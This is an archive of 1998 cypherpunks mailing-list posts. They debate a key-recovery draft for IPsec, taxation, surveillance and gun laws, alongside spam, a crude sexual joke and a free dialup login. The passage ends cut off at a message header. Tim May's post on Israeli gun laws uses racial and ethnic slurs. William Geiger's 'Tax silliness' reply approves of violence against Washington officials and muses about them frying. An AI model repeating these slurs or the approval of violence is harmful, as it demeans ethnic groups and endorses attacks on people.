"Government" is composed of public servants.  This citizen-unit
doesn't want to fund spooks to spy on himself.

> The world is changing into a global society and the rules about
> personal freedom are evolving with it... Not everyone is going to
> like them but the facts are what they are and IMHO - personally I
> wonder more how some local constituency would respond to the
> invasion of their personal privacy when some "pervert terrorist"
> parks a recently acquired nuke or Bio-toxic Weapon from the now

Oh give us a break!  You already admitted that terrorists are going to
use whatever crypto they want whether or not governments succeed in
ramming GAK down our throats.

> defunct Russian Arsenal in their backyard and pushes the #$%^&*
> button. If losing absolute anonymity is the cost of better
> safeguarding oneself and family from threats like these, what the
> heck. Its a very small cost to pay.

Perhaps you would think that video cams in all the rooms in your house
(with feeds back to NSA) would be a good idea also,...  well you
install them, at your cost, and leave us out of your eavesdropping
plans, ta very much.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@road.toad.com>
Date: Tue, 8 Sep 1998 14:54:57 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <Pine.GSO.3.95.980907145305.17348E-100000@well.com>
Message-ID: <199809080651.XAA00528@road.toad.com>
MIME-Version: 1.0
Content-Type: text/plain



  I did not get a chance to download the great archive Ryan did, lets
hope it's on the disk there still, otherwise it has to be rebuilt by
someone.

		||ugh
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 8 Sep 1998 07:05:47 +0800
To: cypherpunks@cyberpass.net
Subject: (fwd) Re: KRAP is at it in the IETF
Message-ID: <199809072253.XAA08953@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




A GAKker breaks cover on dbs list as a result of William Geigers heads
up on the issue... The GAK apologists are very thin on the ground in
public discussion forums generally, so it is nice to see the odd one
speak up.  Seems like they are too busy taking government handouts to
implement KRAP to actually own up to their misdeeds in public,
generally.

Adam

======================================================================
From: "Todd S. Glassey" <TSGman@earthlink.net>
To: "William H. Geiger III" <whgiii@invweb.net>, <dbs@philodox.com>
Cc: <tom_markham@securecomputing.com>, "JeffreySchiller" <jis@mit.edu>,
	"MarcusLeech" <mlecch@nortel.ca>,
	"Robert G. Moskowitz" <rgm@icsa.net>, <tytso@mit.edu>
Subject: RE: KRAP is at it in the IETF
Date: Mon, 7 Sep 1998 13:38:50 -0700

William,
Let me start with the disclaimer since I am going to vehemently disagree
with you - These are my own opinions and in no way reflect my companies or
our clients Opinions, etc. etc. etc. -

So William - IMHO, you are missing the point totally. The IETF is an
A-Political Organization investing in the development of technical standards
to accomplish various networking services. As to the issue of Politic vs.
Technology, by its actions alone, KRAP's demonstrated agenda with the IETF
is purely technical and whether it is in furtherance of its external
political agenda is really irrelevant to the IETF as and its established
process as a whole.

>From my vantage point, the real issue herein is your personal/moral standing
with the dissolving of anonymity through Key Recovery and Government's
ability to look at data that flows over a network. Remember also that it was
the Government that was the primary subsidizer of said same network and
everything that evolved the old 56k ARPANET into what the Public Internet is
today.

As another side issue, the other potentially-viable argument is that
ISAKMP/IKE is so far along in its process of becoming a standard, that
adding a late draft impedes the value of the work already done - Essentially
that these folks  (KRAP) have essentially slipped a whammy onto the stack.
Is it your view that this implies that because of this later posting that
the material will be exempt from the general scrutiny that the previous
components of ISAKMP/IKE have been through - I don't think so... This crowd
loves to do the Pit-Bull thang and shred the submitted concepts to glean the
technical truth therein. If this is the issue then the answer is to work
within the existing framework and to submit a public motion to the WG to
freeze the ISAKMP last call efforts so that they exclude the new draft until
such time as it (the GAK extensions) can undergo further scrutiny.

As to the issue of the addition itself being out of line because of its late
entrance into the standards arena relative to the last call and all that-
Again, I disagree as to what and how - There are numerous "standard
processes" in place that allow for this as well and that here in the real
world, use of this ability is a very common practice. Look for instance at
what happened to the last TAX REFORM effort with the addition of Senator
Moyniham's SS1706 Rider, or as another example look at what congress as a
whole did with the HIPAA legislation (http://www.hcfa.gov/regs/hipaacer.htm)
and its embedded "legal penalties" for unauthorized  disclosure of health
data. Since this case is specific to the bulk distribution of data, it
really applies directly to IT Directors and their staff. heck, imagine that
your insurance Co.'s or hospital's  IT folks could actually go to jail by
the statute set here. Again here we are at the bottom line and if this is
the thing you are objecting too then you need to object to the process not
the event itself.

As to the perversion commentary specifically... perversion is a moral issue
and is not addressed by the IETF rules (RFC2026 in particular). My
suggestion is that if you feel this is a problem that you address it at the
POISSON WG level rather than in IPSEC or PKIX since it is a process problem,
and that under the currently in-place operating rules, this thing, the
filing of a new proposed component of the ISAKMP protocol is OK to do.

- ---

Don't get me wrong, as it happens I too believe that Key Recovery is futile
effort for the government, not because it doesn't have a need for this type
of capability, but because they didn't act fast enough and the "cat is
already out of the bag". So any efforts to pull this one off will most
likely be futile and will definitely not be cost effective for normal
ECommerce operations let alone personal communications. BTW - The reality in
the Intelligence Community World is that for the surveillance of the
big-league terrorists, dope dealers, and the like, key recovery is useless
since because they are so well funded and their access to technologies is
such that they (the bad guys) can and will employ advanced technologies to
get around whatever the NSA/DSIA/DoC/DoJ put in place to thwart them. As an
example of this the Leopard's (sort of the Bolivian Govt.'s DEA Field
Agents, et al.) found that when they attacked the labs of the Median Cartel
they were out gunned and technologically overpowered to the point that
without the US Military intervention they would have no possibility of
thwarting these activities. Draw your own conclusions.

As a point of social commentary, I understand and hear your point, but if
this kind of process "invasion" as you have put it was such an issue then
how come there was so little push back was done against the "Communications
Assistance for Law Enforcement Act" (CALEA). I think that as a whole the
people against the KRAP initiatives are there because of the cost and
overhead issues, not the personal freedom ones. Thus it becomes a business
issue and not a human one.

The world is changing into a global society and the rules about personal
freedom are evolving with it... Not everyone is going to like them but the
facts are what they are and  IMHO - personally I wonder more how some local
constituency would respond to the invasion of their personal privacy when
some "pervert terrorist" parks a recently acquired nuke or Bio-toxic Weapon
from the now defunct Russian Arsenal in their backyard and pushes the #$%^&*
button. If losing absolute anonymity is the cost of better safeguarding
oneself and family from threats like these, what the heck. Its a very small
cost to pay.

My personal feeling is that since I have made the decision to live in and
work with modern society as a whole, that I must follow the edicts that
evolving technologies and social values/morals put in place by and for us as
a whole. Otherwise our choice is real simple - If you don't like the rules,
then don't play the game. Move out to the backwoods and stay out of society
as a whole.

I don't mean to be a putz by this, but come on... "a perversion". This isn't
the place for that kind of morality issue!.

Todd

> -----Original Message-----
> From: dbs@philodox.com [mailto:dbs@philodox.com]On Behalf Of William H.
> Geiger III
> Sent: Monday, September 07, 1998 1:24 AM
> To: dbs@philodox.com
> Subject: KRAP is at it in the IETF
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Hello,
>
> It has come to my attention that the KRAP (key recovery alliance program)
> has submitted an I-D (internet draft) to the IETF for adding GAK
> (government access to keys) to the IPSEC protocols:
>
> ftp://ftp.ietf.org/internet-drafts/draft-rfced-exp-markham-00.txt
>
> ISAKMP Key Recovery Extensions
> <draft-rfced-exp-markham-00.txt>
>
> 7. AUTHOR INFORMATION
>
>    Tom Markham
>    Secure Computing Corp
>    2675 Long Lake Road
>    Roseville, MN 55113   USA
>
>    Phone: 651.628.2754,    Fax:   651.628.2701
>    EMail: tom_markham@securecomputing.com
>
>
> I consider this a perversion of the standards process of the IETF to
> advance a political agenda which must be stopped at all cost.
>
> Below are the e-mail addresses of some people that you should write
> (politely) expressing your objections to any such additions to the
> protocols:
>
> IPSEC Chairs:
>
> Theodore Ts'o <tytso@mit.edu>
> Robert Moskowitz <rgm@icsa.net>
>
> Security Area Directors:
>
> Jeffrey Schiller <jis@mit.edu>
> Marcus Leech <mlecch@nortel.ca>
>
> As I mentioned before, be polite. These people are not the ones proposing
> GAK be added to the IPSEC protocols. They have put a lot of time and
> effort in forwarding the cause for strong encryption. They should be made
> aware of the communities objections to these attempts by KRAP.
>
> Thanks,
>
> - --
> - ---------------------------------------------------------------
> William H. Geiger III  http://www.openpgp.net
> Geiger Consulting    Cooking With Warp 4.0
>
> Author of E-Secure - PGP Front End for MR/2 Ice
> PGP & MR/2 the only way for secure e-mail.
> OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
> - ---------------------------------------------------------------
>
> Tag-O-Matic: It's OS/2, Jim, but not OS/2 as we know it.
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3a-sha1
> Charset: cp850
> Comment: Registered_User_E-Secure_v1.1b1_ES000000
>
> iQCVAwUBNfOVk49Co1n+aLhhAQFJwwP+O4vrZVKFpOG8vCHFwbDuPIv/99AhBnKF
> RK/Ikc5y2gGKq9hfxkTb4o77YUrDaEGkYUPHk+ZC57Oag0Lu1v6W1EAbQ5T4RpzH
> JWYXOonQmbqw5rH0h6brzqrH3ep9Ej9DR0gv4mGgIfSNlJSUu6TWO5ZHXKWiE4yy
> 5flH0Ngg/TI=
> =EzNL
> -----END PGP SIGNATURE-----
>
> Tag-O-Matic: Speed Kills - Use Windows!
>
>
>
------- End of forwarded message -------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 8 Sep 1998 07:32:13 +0800
To: cypherpunks@cyberpass.net
Subject: free anonymous dial up in the UK
In-Reply-To: <001ff2318210798WEB@www.telinco.net>
Message-ID: <199809072328.AAA09363@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




If any of you are in the UK anytime, you can get free dialup using the
following recently posted details:

> Login = FREE256974
> Password = cypherpunk
> 
> To connect FREE to 33.6Kbps access or 28.8Kbps please use 0845 662 1009
> To connect FREE to K56Flex access please use 0845 662 1109
> To connect FREE to 56K X2 access please use 0845 662 1209
> To connect FREE to 64K ISDN access please use 0845 662 1309

In the UK local calls are not free (about 1p/min offpeak).  The ISP
for the above service (www.aardvaak.co.uk) gets it's income via a
commission on the phone calls to their dialup numbers.

(Most ISPs in the UK charge 10 UKP/month, and you have to pay the
local call on top).

Anyway the interesting part is the degree of anonymity it gives, as
they don't need payment from you, they don't need to know who you are.

Also there is www.freenet.co.uk, they offer pop3 mail accounts, and
usenet access, but if you already have an ISP you probably don't want
all that.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 8 Sep 1998 13:52:14 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Tax silliness
In-Reply-To: <v03130300b21a7226574d@[209.66.100.138]>
Message-ID: <199809080548.BAA06556@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03130300b21a7226574d@[209.66.100.138]>, on 09/07/98 
   at 10:39 PM, Tim May <tcmay@got.net> said:

>Those fuckers in D. C. need to be put out of our misery.

I agree 110%. This is something I have though long and hard on and have
come to the conclusion that a single strike to take out DC would only lead
to the establishment of a military dictatorship (though I must admit that
watching those bastards fry would almost be worth it <EG>). Eventually
some form of democracy would be restored (but freedoms would be much less
than what we have now) as it is simpler to control the sheeple if they
think they are running things.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Speed Kills - Use Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfTHLY9Co1n+aLhhAQE3mQP+NjiXyWzR20LJJu5KzsHIKwcIaDoxWcrj
O4bn/N2d2SmUQVMkIC7jFXlLpzGQ6COMTK1fAgYtlOe4dk6B4sC4TYv68D8xSix4
vaTC6z8kaF6ZojY3i9hANQhw7aBH7D5bfco+JBtfpwYWIcMOIvQ/hHAJOooPeyPa
w7YHYljne6k=
=fBi0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Sep 1998 16:06:01 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Tax silliness
In-Reply-To: <v03130300b21a7226574d@[209.66.100.138]>
Message-ID: <199809080800.BAA17066@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



admittedly I'm not an expert on the subject,
but maybe the fan hands it back to mcguire for
authentication--for him to sign it, and return it to
the fan who then owns it. as far as collectors
items, a baseball can't be authenticated otherwise. 
I presume mcguire would have to write something
about "my 62nd home run ball"..

but your point is well taken. the IRS is getting
out of control. frankly I think they are like a huge
crowbar or vice that is slowly pressing down on the population.
all the loopholes are being removed from tax laws,
slowly, quietly. people who had no problem as independent
contractors (such as caddies) now get harassed by
the IRS. also, waiters & bartenders, who never made
much money, got a lot of flack over tips around the
late 80's.

eventually perhaps we'll have one world currency, and absolutely
no means of exchanging it other than through government
tracked mechanisms, all subject to taxes. 
that does seem to be the direction the world is heading.

I've written before on "alternative money systems". no
one here understood my points very well, but I still think
there is major potential for freedom through them. a sort
of 21st century tea party. there are some "barter cards"
that are taking off in various localities. these are
essentially tax-avoidance barter systems..  I hope they
catch on and force a showdown with politicians. eventually
the control freaks will be obvious and will not be
able to hide their tyranny. hopefully. the thing about
the american public though, is that sometimes they stay
asleep & give consent even when the tyrants emerge obvious.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Tue, 8 Sep 1998 11:00:42 +0800
To: cypherpunks@toad.com
Subject: Re: h
Message-ID: <dd57698b8bf6a89f5ae5d0b464087779@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 7 Sep 1998 CRBREW9802@aol.com wrote:

> 
> how did u do it
> 
> 

Usually, it is done as follows:

1) Find a willing partner. If you're a Democrat, find a subordinate or an
intern.
2) Make sure your partner wears appropriate attire. If you're a Democrat,
a blue dress is appropriate.
3) Unzip your pants.
4) Tell your partner to "kiss it."
5) When you ejaculate, make sure your partner does something suitable with
the ejaculate. If you're a Democrat, ensure that she dribbles it over the
dress.
6) If you're a Democrat, ensure that she saves the dress, doesn't have it
cleaned, and then turns it over to the FBI for DNA testing.

For our AOL friend, the following has been converted into the Language of
the AOLholes:

i) find a wiling partner if your a democrat find a subordinate or a
intern...
2) make sure your partner wears right clothing if you're a democrat a blue
dress is right........
3... unzipp you pants
4) tell you partner to kiss it...
5-when u cum make sure your bitch does something with the jiz if your a
democrat make sure she drops it in the dress man...
6) If you'r a democrat make sure that she saves da dress...and doesn't
have it cleaned...and gives it to the FIB for RNA testing...

LamenessMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 8 Sep 1998 02:55:52 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Government Regulation & Scienctific Research
In-Reply-To: <199809071711.MAA04033@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980908023954.12495E-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 7 Sep 1998, Jim Choate wrote:

> Because of the changes in national governments and their increasing desire
> to regulate their citizenry and their economies according to flawed economic
> and social dogma we will see the following:

I have a little bit of a different take on things...

I expect the first world to start to take after the East German model.

-- Those who are precieved as being a possible threat will be
marginalized, jailed, forced to flee, or co-opted.

-- A large portion of the population will be devoted towards control of
the population.  (Either in law enforcement, paid snitches, propaganda, or
similar activities.)

-- Much of the Government's budget will be devoted to citizen control.
(More will be spent on fighting internal threats than defending from
external threats.)  And since "The imposition of order = the escalation of
disorder", it will only spiral downwards.

In 50 years I expect that the creative citizenry will either be
underground, fled, or no longer participating in the active discorse of
the society.  All of the life will be sucked out of the population in
order to fight the "Scapegoats of the Week/Month/Year/Century". 

It will only fall apart when we reach a level where no one wants to live
here any more and it falls apart from internal system failure and
hemoraging.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Lucier" <james.lucier@worldnet.att.net>
Date: Tue, 8 Sep 1998 15:58:32 +0800
To: "Tim May" <declan@well.com>
Subject: RE: What we are Fighting
In-Reply-To: <v03130308b219b1d32914@[209.66.100.36]>
Message-ID: <000201bddb17$23206be0$08b24e0c@oemcomputer>
MIME-Version: 1.0
Content-Type: text/plain



Actually, Tim, the way the Men in Black work is that they keep their bans on
domestic crypto under wraps until the last moment and then get them adopted
with no public hearings in the crisis atmosphere of a heavily lobbied markup
session at some critical point in the legislative calendar.  They know that
the more people actually understand what they are up to, the less they are
likely to get what they want.  But do not underestimate the power of having
useful stooges like Jerry Solomon and the shamefully clueless Jon Kyl in
positions where they can do last-minute switcheroo on bills that are being
moved to the floor.  One of the major reasons why we didn't get the
Goodlatte bill on the floor this year is that moving it to the Floor would
have resulted in putting Oxley Manton or the House Intelligence Committee
bill on the Floor at the same time.

-----Original Message-----
From:	owner-cypherpunks@cyberpass.net
[mailto:owner-cypherpunks@cyberpass.net] On Behalf Of Tim May
Sent:	Monday, September 07, 1998 8:55 AM
To:	Declan McCullagh
Cc:	cypherpunks@cyberpass.net
Subject:	Re: What we are Fighting

At 6:53 AM -0700 9/7/98, Declan McCullagh wrote:

>There is, offically, a proposal on the table to limit speech within the
>U.S. by restricting sale, manufacture, distribution, import of non-GAK'd
>crypto. A House committee approved that one year ago.
>

I'd forgotten about that little one. Of course, it has not gone anywhere
(no Senate version or committee markup, right?), so I'm not yet ready to
say there's official action on its way. And, fortunately, the session is
over but for the shouting about Clinton and his cigars.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: promo@printing.com
Date: Tue, 8 Sep 1998 16:52:19 +0800
To: cypherpunks@toad.com
Subject: Auto Reply to your message ...
Message-ID: <35F478A400000217@mail.agtinc.net>
MIME-Version: 1.0
Content-Type: text/plain

  -----  The following text is an automated response to your message  -----
Thank you for requesting samples of Web Cards.
We will be sending you several samples and a brochure within 24 hours.

Web Cards can be used in so many ways that we've prepared a special free
report on how 50 businesses have used them.  To get your report, simply
send an email to ideas@printing.com and it will be sent to you by email
immediately.

Web Cards are easy to order too.  You can use the on-line form at our Web
Site www.printing.com or print the form and fax it to 908-757-2604 or call
us at 800-352-2333.  We're very helpful and will work with you to adapt
your site to a postcard at no charge.

After setting up your card (which takes about 24 hours), we'll post a
"proof" of what it looks like on the Web and send you the address for you
to approve.  And if you have any changes, don't hesitate, there's no charge
for helping you get exactly what you want.

In the meantime, if you have any questions or would like sample cards for a
specific type of business, please call us at 800-352-2333 or email me at
joe@printing.com.

Sincerely,

Joe Haedrich
President




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fsigs@relay.lg.co.kr
Date: Tue, 8 Sep 1998 07:02:32 +0800
To: cypherpunks@Algebra.COM
Subject: FutureSignals
Message-ID: <ewdgdwxxevbosipm>
MIME-Version: 1.0
Content-Type: text/plain



This message is being sent to you in compliance with the 
proposed Federal legislation for commercial email (S.1618
 - SECTION 301).
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html

"Pursuant to Section 301, Paragraph (a)(2)(C) of S. 1618,
further transmissions to you by the sender of this email 
may be stopped at no cost to you by sending a reply to this 
email by following the directions below this message.

========================================================


Attention Futures Traders 
Receive Real-time INSTANT FutureSignals over the internet 
by Noted CTA.

Futures traders, our service sends INSTANT FutureSignals 
via the internet as they are generated for the following 
markets:


S&P 500, Nasdaq 100, E-Mini, Unique Futures Trading 
Opportunities.


Our FutureSignals come with Profit objectives for 
Scalpers, Daytraders and Postion Traders. We also issue 
trailing stops and important info we hear in the pits 
throughout the day.  

Our service has been featured in Futures Magazine.


For a FREE 3 DAY TRIAL go to :


http://www.bulkmate.com/futuresignals/

<A HREF="http://www.bulkmate.com/futuresignals/">
http://www.bulkmate.com/futuresignals/</A>


Futures trading involves risk. Only use risk capital. Please read 
CFTC disclaimer on our website.



To be removed from this list, simply send a blank email to:
fsremove@do-it-now.net


NOTE: It is not our intention to infiltrate or advertise to any
investing/trading-related discussion groups. If this has 
been the case, our apologies and please follow the removal
instructions above.



Sent from: FutureSignals
Email : fs@do-it-now.net
Address: PO Box 351, Verplanck, NY, 10596
Telephone: 212-501-4281 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 00:35:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <tw71zpmhe9n.fsf@denmark-vesey.MIT.EDU>
Message-ID: <v03130303b21b0886ab43@[209.66.100.138]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:26 AM -0700 9/8/98, Ryan Lackey wrote:
>> [gun control laws in other countries being even worse than the US]
>
>Does anyone know of any countries with more reasonable gun laws than the
>US?  I vaguely think Israel and Switzerland are better, at least for citizens.
>It is one of the major problems I have with Anguilla -- "guns are bad".
>I miss my M1A.

Don't automatically assume Israel is good for gun ownership. If you're an
untermenschen, a schwarzen, a sand nigger, an Arab, you can't legally own a
gun. Unless you're one of the Trustees, i.e., a deputized member of the
PLO's military or police.

The Chosen People are of course encouraged to have fully automatic weapons.

(This is not a detailed elaboration of Israeli gun laws. Maybe even some
Jews are forbidden to have guns. Israel has a lot of laws. But I know that
"settlers" carry Uzi and suchlike openly, while Arabs in the same lands are
forbidden from even owning shotguns or .22s.)

Switzerland is also not what many think it is. While able-bodied men who
served in the military have weapons issued to them that they keep at home,
this does not necessarily imply gun ownership nirvana. For one thing, all
the guns are tracked. For another, visitors or temporary residents face the
usual surveillance state controls.

Don't count on there being Gun Show and Swap Meets, where folks trade .45s
and 9s and Uzis and AR-15s and M1As without benefit of notifying the
Supreme Ruler and His Minions. (Such as our Second Amendment says we can
do, until the commies took over in these Beknighted States.)

>I mostly have two classes of guns I'd like to have: air pistol, for
>practice and competition, and military-style semiautomatic rifles, for
>practice and long-term defense.  Self-defense handguns and shotguns
>are somewhat optional.

See above. Let us know if you find anyplace in the Caribbean which actually
allows these kinds of guns to be owned by the sheeple.


--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 8 Sep 1998 23:27:53 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <tw71zpmhe9n.fsf@denmark-vesey.MIT.EDU>
Message-ID: <199809081522.LAA14823@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <tw71zpmhe9n.fsf@denmark-vesey.MIT.EDU>, on 09/08/98 
   at 10:26 AM, Ryan Lackey <rdl@MIT.EDU> said:

>Does anyone know of any countries with more reasonable gun laws than the
>US?  I vaguely think Israel and Switzerland are better, at least for
>citizens. It is one of the major problems I have with Anguilla -- "guns
>are bad". I miss my M1A.

Well back when I lived in Israel during the early '80s everyone had guns,
and a lots of them. My landlord had a small armory in his bombshelter
(something ever home has). I do not know what the gun laws are there
concerning non-military citizens, but considering that everyone is in the
military this doesn't seem to be much of an issue (unless you are a
Palestinian).

Nice country to live, good climate (comparable to southern California),
friendly people, civilized country, strong European influence to the
culture (for obvious reasons), parliamentary form of government. Inflation
was *very* bad when I was there (I think only Italy & Argentina was worse)
hopefully this has improved.

I left at the end of '82 before all this crap with the Palestinians
started. I don't know what shape basic liberties have taken since I have
left. I imagine that after 50 years of continual war things are a little
more restrictive than what most Americans are accustom to.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows: The CP/M of the future!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfVNqI9Co1n+aLhhAQH3EwP/VZ0hgtMSKkx5Rdm538UbYGOCRjZ3bQbG
TrbSm1nVbtT3UeT6vXbm8thrl9zmu8wQup0iOhLqmbDIFfKrgr43rOnS8vWos1Ud
JPMmt5lKwzsq40QhJNd1bPBU98Bk4do9gH4U4035b12Pkd85lJXHJHMe3BVUDRHT
hNSNmbecAE0=
=3Q9Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Wed, 9 Sep 1998 01:42:58 +0800
To: Mok-Kong Shen <cypherpunks@cyberpass.net
Subject: Re: IP: Encryption Expert Says U.S. Laws Led to Renouncing of   Citizenship
In-Reply-To: <v0401173cb2186ae5e832@[139.167.130.246]>
Message-ID: <3.0.5.32.19980908101154.00853210@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:01 AM 9/7/98 +0100, Mok-Kong Shen wrote:
>Robert Hettinga wrote:
>
>Let's wait and see whether AES will be genuinely exportable.
>
>M. K. Shen
>

Surely you jest.  The head AES honcho will send you (in .de) the CD of the
english
specs, but not the one with the code.  Like it matters.

They will continue playing games and misbehaving until punished.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xena - Warrior Princess <xena@best.com>
Date: Wed, 9 Sep 1998 01:36:58 +0800
To: cypherpunks@toad.com
Subject: "info on spooks"
Message-ID: <Pine.BSF.4.02A.9809081023001.29273-100000@shell16.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain





The Internet Oracle has pondered your question deeply.
Your question was:

> 
> Maybe *you* can help, Mighty Oracle.
> 
> ---------- Forwarded message ----------
> Date: Sat, 29 Aug 1998 20:19:26 EDT
> From: XxxxXxxx@aol.com
> To: cypherpunks@toad.com
> Subject: tell me
> 
>  hola and good tidings 
>   send some info on spooks please 
>   i will be grateful
> 

And in response, thus spake the Oracle:

}
}   In a way, you have come to the right place, Supplicant.  Some of my best
} friends are spooks.  Generally, they like to be known as "The Intangible
} Ones", but that's a bit of pretentiousness on their parts.  "Ghoul",
} "ghost", "spirit", and "weird white smudge on film" all are appropriate
} names.
}   Some of their favorite haunts, if you will, tend to be different than
} what current culture dictates.  For example, spooks will not hang out in
} old houses.  Too many cobwebs, bugs, and general naughtiness.  Spooks are
} very sensitive creatures, and prefer to relax in libraries, arboretums,
} Newt Gingrich's bedroom -- places where nothing ever happens.
}   There's not much else to spooks, dear Supplicant.  They're really quite
} nice and friendly, and I recommend you make them a big steak dinner every
} once in a while.  Leave it out on the table, and make sure you tell me
} your address so I can come by... er, so I can notify the spooks.
} 
} You owe the Oracle some new potatoes to go with that steak.
} 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Tue, 8 Sep 1998 22:32:28 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
Message-ID: <tw71zpmhe9n.fsf@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> [gun control laws in other countries being even worse than the US]

Does anyone know of any countries with more reasonable gun laws than the
US?  I vaguely think Israel and Switzerland are better, at least for citizens.
It is one of the major problems I have with Anguilla -- "guns are bad".
I miss my M1A.

I mostly have two classes of guns I'd like to have: air pistol, for
practice and competition, and military-style semiautomatic rifles, for
practice and long-term defense.  Self-defense handguns and shotguns
are somewhat optional.

A country like Switzerland seems ideal, at least as a citizen, given
the reserve requirements.  Mmmm, a nice Hammerli air pistol and
a shiny new HK PSG-1 would make me forget about the M1A I left behind, very
quickly.  Especially with a good daylight scope and an IR scope...  Only
$30k or so for the package with 10k rounds of national match ammo.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		<-- down




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Wed, 9 Sep 1998 01:42:05 +0800
To: remailer@replay.com
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <v0313030ab219b7376d3b@[209.66.100.36]>
Message-ID: <3.0.5.32.19980908103600.008469f0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



::
Anon-To: Ryan Lackey <ryan@arianrhod.systemics.ai>, Tim May <tcmay@got.net>


At 03:27 PM 9/7/98 -0400, Ryan Lackey wrote:
>Anguilla is actually a pretty reasonable choice as far as a place to
>spend a few years away from the US -- 7 000 people, many with a strong


Jul 7 1999

The US today launched a cruise missile strike against Anguilla, 
where Osama bin "Blowback" Laden was known, according to US National
Security officials, to be investing in an online gambling casino.



--Count of Monte Carlo









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 9 Sep 1998 01:58:54 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: wired on y2k
